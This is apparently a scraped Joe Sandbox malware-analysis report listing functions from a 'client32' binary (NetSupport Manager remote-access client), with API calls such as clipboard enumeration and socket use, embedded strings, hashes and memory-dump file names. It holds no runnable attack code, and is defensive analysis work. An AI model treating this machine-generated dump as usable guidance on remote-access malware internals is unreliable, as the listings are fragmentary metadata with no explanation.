Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Prop$wsprintf$Exception@8RemoveThrow_malloc_memsetstd::exception::exception
                                                                                                                                                    • String ID: NSMStatsWindow::m_aProp$UI.CPP$hWnd=%x, uiMsg=x%x, wP=x%x, lP=x%x
                                                                                                                                                    • API String ID: 2013984029-1590351400
                                                                                                                                                    • Opcode ID: e646804ecc7ddf954b9f726e774aae96fceda95ccf96e222f81c043a3edeb97b
                                                                                                                                                    • Instruction ID: 9c375b31db466058645a4841bcb89a7be01c9296122d1f1adc6750c52d58ca69
                                                                                                                                                    • Opcode Fuzzy Hash: e646804ecc7ddf954b9f726e774aae96fceda95ccf96e222f81c043a3edeb97b
                                                                                                                                                    • Instruction Fuzzy Hash: 9071EC76B002299FD714CFA9DD80FAEF7B8FB88315F00416FE54697244DA71A944CBA1
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _strtok$_malloc
                                                                                                                                                    • String ID: *extra_bytes$..\ctl32\AUDIO.CPP$Audio$Send EV_CONFIGSET from %s@%d$nbytes <= sizeof (extra_bytes)
                                                                                                                                                    • API String ID: 665538724-3655815180
                                                                                                                                                    • Opcode ID: 39f51e78e1d6d557cb57fe6939ee2718794244c86e9f6e4480e23a56394e5660
                                                                                                                                                    • Instruction ID: adf310d86d08ca25db8df7bbab2a8961bf55d7c961d25e6615f2bb86ec9d3f5a
                                                                                                                                                    • Opcode Fuzzy Hash: 39f51e78e1d6d557cb57fe6939ee2718794244c86e9f6e4480e23a56394e5660
                                                                                                                                                    • Instruction Fuzzy Hash: 17A14874E012299FDB61CF24C990BEAF7F4AF49344F1484E9D98DA7241E770AA84CF91
                                                                                                                                                    APIs
                                                                                                                                                    • CountClipboardFormats.USER32 ref: 11033091
                                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                      • Part of subcall function 11110230: _malloc.LIBCMT ref: 11110239
                                                                                                                                                      • Part of subcall function 11110230: _memset.LIBCMT ref: 11110262
                                                                                                                                                    • EnumClipboardFormats.USER32(00000000), ref: 110330F6
                                                                                                                                                    • GetLastError.KERNEL32 ref: 110331BF
                                                                                                                                                    • GetLastError.KERNEL32(00000000), ref: 110331C2
                                                                                                                                                    • IsClipboardFormatAvailable.USER32(00000008), ref: 11033225
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ClipboardErrorLast$Formats$AvailableCountEnumExitFormatMessageProcess_malloc_memsetwsprintf
                                                                                                                                                    • String ID: ..\ctl32\clipbrd.cpp$Error enumclip, e=%d, x%x$ppFormats
                                                                                                                                                    • API String ID: 3210887762-597690070
                                                                                                                                                    • Opcode ID: 783cfaeac01b76432846342580ba7980eef49404acbb133f97720025ffc7a27a
                                                                                                                                                    • Instruction ID: b804fa4b4600a3d7d633b164336aeb5b10f9113d5bb37ecf981567cf99ca6661
                                                                                                                                                    • Opcode Fuzzy Hash: 783cfaeac01b76432846342580ba7980eef49404acbb133f97720025ffc7a27a
                                                                                                                                                    • Instruction Fuzzy Hash: 02518B75E1822A8FDB10CFA8C8C479DFBB4EB85319F1041AAD859AB341EB719944CF90
                                                                                                                                                    APIs
                                                                                                                                                    • EnterCriticalSection.KERNEL32(111EE294,1EF76653,?,?,?,?,00000000,11181BDE), ref: 110535C4
                                                                                                                                                    • LeaveCriticalSection.KERNEL32(111EE294,00000000,?,?,?,?,00000000,11181BDE), ref: 11053789
                                                                                                                                                      • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                                                                                      • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                                                                                      • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                                                                                    • std::exception::exception.LIBCMT ref: 11053635
                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 1105364A
                                                                                                                                                    • GetTickCount.KERNEL32 ref: 11053660
                                                                                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 11053747
                                                                                                                                                    • LeaveCriticalSection.KERNEL32(111EE294,list<T> too long,00000000,?,?,?,?,00000000,11181BDE), ref: 11053751
                                                                                                                                                      • Part of subcall function 110D0A10: _free.LIBCMT ref: 110D0A3D
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CriticalSection$Leave$CountEnterException@8ThrowTickXinvalid_argument_free_malloc_memsetstd::_std::exception::exceptionwsprintf
                                                                                                                                                    • String ID: IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$list<T> too long
                                                                                                                                                    • API String ID: 2238969640-1197860701
                                                                                                                                                    • Opcode ID: 56db25419c0e47adced9616d36e05b27263c0d593e28ae4636820008f3c37c9f
                                                                                                                                                    • Instruction ID: 9fd56e3a4776fcf28e1c6ce8a1981ca07dec16432dee4cc0167aa7d7c32ba94c
                                                                                                                                                    • Opcode Fuzzy Hash: 56db25419c0e47adced9616d36e05b27263c0d593e28ae4636820008f3c37c9f
                                                                                                                                                    • Instruction Fuzzy Hash: 31517179E062659FDB45CFA4C984AADFBA4FF09348F008169E8159B344F731A904CBA5
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                                                                                    • GetOEMCP.KERNEL32(View,Cachesize,00000400,00000000,776CC3F0,00000000), ref: 11065525
                                                                                                                                                      • Part of subcall function 11064880: _strtok.LIBCMT ref: 110648C0
  • Part of subcall function 11064880: _strtok.LIBCMT ref: 110648F0
• GetDC.USER32(00000000), ref: 11065558
• GetDeviceCaps.GDI32(00000000,0000000E), ref: 11065563
• GetDeviceCaps.GDI32(00000000,0000000C), ref: 1106556E
• ReleaseDC.USER32(00000000,00000000), ref: 110655B9
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: CapsDevice_strtok$Release__wcstoi64
• String ID: 932, 949, 1361, 874, 862$Cachesize$Codepage$DBCS$View
• API String ID: 3945178471-2526036698
• Opcode ID: 058c2aae16d643b31adc47a1744bed462daca89727d2630be5973e582d58aa57
• Instruction ID: 682317bc02e2a30c69588dc0a9c96f0ce4cbb9861371b6ad8b8e837dbdf19ace
• Opcode Fuzzy Hash: 058c2aae16d643b31adc47a1744bed462daca89727d2630be5973e582d58aa57
• Instruction Fuzzy Hash: DA21497AE002246BE3149F75CDC4BA9FB98FB08354F014565F969EB280D775A940C7D0
APIs
• GetMenuItemCount.USER32 ref: 1101F2B5
• _memset.LIBCMT ref: 1101F2D8
• GetMenuItemInfoA.USER32(?,00000000,00000001,?), ref: 1101F2F6
• _free.LIBCMT ref: 1101F305
  • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
  • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
• _free.LIBCMT ref: 1101F30E
• DeleteObject.GDI32(00000000), ref: 1101F32D
• DeleteObject.GDI32(00000000), ref: 1101F33B
Strings
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: DeleteItemMenuObject_free$CountErrorFreeHeapInfoLast_memset
• String ID: $0$UndoOwnerDraw
• API String ID: 4094458939-790594647
• Opcode ID: 6ed4e77d9c016c8eff6e2e5212ae31cf16a08a19f327eae3f04c88df89f206e5
• Instruction ID: 9f4c9540ed3e85911a06978235dbefa5e19a2329fc37d196683f21109e2371eb
• Opcode Fuzzy Hash: 6ed4e77d9c016c8eff6e2e5212ae31cf16a08a19f327eae3f04c88df89f206e5
• Instruction Fuzzy Hash: 16119671E162299BDB04DFE49C85B9DFBECBB18318F000069E814D7244E674A5108B91
APIs
• wsprintfA.USER32 ref: 1106F737
• EnterCriticalSection.KERNEL32(?,?,?,?,?,?), ref: 1106F788
• LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?), ref: 1106F7A8
Strings
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: CriticalSection$EnterLeavewsprintf
• String ID: %s:%d$(null)$ListenPort$NameResp from %s(%s), len=%d/%d, flags=%d, channel=%s$Port$TCPIP$UseNCS$tracerecv
• API String ID: 3005300677-3496508882
• Opcode ID: b470564540ec67704f5c8bb6b18a5cda2ad223c2dcf1e5bacda87c2cf28e558c
• Instruction ID: f86a0a3523b45ae2aa4ac8696085f91b0c00e2f9513f1a57450127c273c63767
• Opcode Fuzzy Hash: b470564540ec67704f5c8bb6b18a5cda2ad223c2dcf1e5bacda87c2cf28e558c
• Instruction Fuzzy Hash: 17B19F79E003169FDB10CF64CC90FAAB7B9AF89708F50419DE909A7241EB75AD41CF62
APIs
• IsWindow.USER32(00000000), ref: 1104147B
  • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
• SendMessageTimeoutA.USER32(?,0000004A,000A0036,?,00000002,00002710,?), ref: 11041670
• _free.LIBCMT ref: 11041677
Strings
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: MessageSendTimeoutWindow__wcstoi64_free
• String ID: Client$DisableJournalMenu$IsA()$Journal status( bNoMenu = %d, gpJournal = %x, %d, %d) bVistaUI %d$SendJournalStatustoSTUI(%d, %d, %d, %d)$e:\nsmsrc\nsm\1210\1210f\ctl32\DataStream.h
• API String ID: 1897251511-2352888828
• Opcode ID: fa5a56d3959a27f69506f65d8ccf5def50a2be3eef365412e5d35b6d21c3e654
• Instruction ID: 7d7d201ace8770d3ab851aba43ef7aa7a0e05de8b0dcb1a0fb6fb2d6540d47c3
• Opcode Fuzzy Hash: fa5a56d3959a27f69506f65d8ccf5def50a2be3eef365412e5d35b6d21c3e654
• Instruction Fuzzy Hash: 37717DB5F0021AAFDB04DFD4CCC0AEEF7B5AF48304F244279E516A7685E631A905CBA1
APIs
• _memset.LIBCMT ref: 110513F9
• CloseHandle.KERNEL32(?,Client,UserAcknowledge,00000000,00000000), ref: 110514DB
  • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
Strings
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseHandle__wcstoi64_memset
                                                                                                                                                    • String ID: 10.21.0.0$Client$PolicyChanged, disconnect$PolicyChanged, invalid user, disconnect$PolicyChanged, userack needed, disconnect$UserAcknowledge$_profileSection
                                                                                                                                                    • API String ID: 510078033-311296318
                                                                                                                                                    • Opcode ID: 628bd5edbdc2b934cdea530cf6e87229bc90534bd2c32232888589127f272096
                                                                                                                                                    • Instruction ID: d6821365ce57f0d8f52ec6341a9adbf8752ca4ec49bea4256a0f2cceaf2f1fbd
                                                                                                                                                    • Opcode Fuzzy Hash: 628bd5edbdc2b934cdea530cf6e87229bc90534bd2c32232888589127f272096
                                                                                                                                                    • Instruction Fuzzy Hash: D0513E75F4034AAFEB50CA61DC41FDAB7ACAB05708F144164FD05AB2C1EB71B604CB51
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CountTick
                                                                                                                                                    • String ID: APMSUSPEND, suspended=%u, suspending=%u, resuming=%u$Client$DisableStandby$IgnorePowerResume$Stop resuming$_debug
                                                                                                                                                    • API String ID: 536389180-1339850372
                                                                                                                                                    • Opcode ID: b0d48e285380544e5a04f23f59acccb283078a85027adb73250184a2610d4c83
                                                                                                                                                    • Instruction ID: 7a2480a0f38ec62df9d6165c4879ba51ca1346fdc5c877313ede350298642e4b
                                                                                                                                                    • Opcode Fuzzy Hash: b0d48e285380544e5a04f23f59acccb283078a85027adb73250184a2610d4c83
                                                                                                                                                    • Instruction Fuzzy Hash: 8541CD75E022359BE712CFE1D981BA9F7E4FB44348F10056AE83597284FB30E680CBA1
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    • SetTSModeClientName(%d, %s) ret %d, xrefs: 111077FF
                                                                                                                                                    • Warning. took %d ms to get simap lock, xrefs: 1110773D
                                                                                                                                                    • Warning. simap lock held for %d ms, xrefs: 11107825
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CountTick$CriticalSection$EnterLeave_strncpy
                                                                                                                                                    • String ID: SetTSModeClientName(%d, %s) ret %d$Warning. simap lock held for %d ms$Warning. took %d ms to get simap lock
                                                                                                                                                    • API String ID: 3891031082-3311166593
                                                                                                                                                    • Opcode ID: e724e7b83d875102122b1b16448b14bdaea8f0febcc2212ee161bb5a17434397
                                                                                                                                                    • Instruction ID: d3321afa8f45acf833dece3f06e7fdc0391082dc92555cffabcd4bc49ffbb5d2
                                                                                                                                                    • Opcode Fuzzy Hash: e724e7b83d875102122b1b16448b14bdaea8f0febcc2212ee161bb5a17434397
                                                                                                                                                    • Instruction Fuzzy Hash: 6641327AE00A19AFE710DFA4C888F9AFBF4FB05358F014269E89597341D774AC40CB90
                                                                                                                                                    APIs
                                                                                                                                                    • OutputDebugStringA.KERNEL32(NsAppSystem Info : Unexpected data from NsStudentApp...), ref: 110DD77D
                                                                                                                                                    • std::exception::exception.LIBCMT ref: 110DD7B8
                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 110DD7D3
                                                                                                                                                    • OutputDebugStringA.KERNEL32(NsAppSystem Info : Control Channel Closed by 0 bytes RECV...), ref: 110DD841
                                                                                                                                                    • OutputDebugStringA.KERNEL32(NsAppSystem Info : CONTROL CHANNEL Data Recv ********* THREAD TERMINATING *********), ref: 110DD875
                                                                                                                                                      • Part of subcall function 110D7F00: __CxxThrowException@8.LIBCMT ref: 110D7F6A
                                                                                                                                                      • Part of subcall function 110D7F00: #16.WSOCK32(?,?,?,00000000,00001000,1EF76653,?,00000000,00000001), ref: 110D7F8C
                                                                                                                                                      • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                                                                                      • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                                                                                      • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                                                                                    Strings
                                                                                                                                                    • NsAppSystem Info : CONTROL CHANNEL Data Recv ********* THREAD TERMINATING *********, xrefs: 110DD870
                                                                                                                                                    • NsAppSystem Info : Unexpected data from NsStudentApp..., xrefs: 110DD775
                                                                                                                                                    • NsAppSystem Info : Control Channel Closed by 0 bytes RECV..., xrefs: 110DD83C
                                                                                                                                                    • NsAppSystem Info : Control Channel Waiting For Data..., xrefs: 110DD703
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
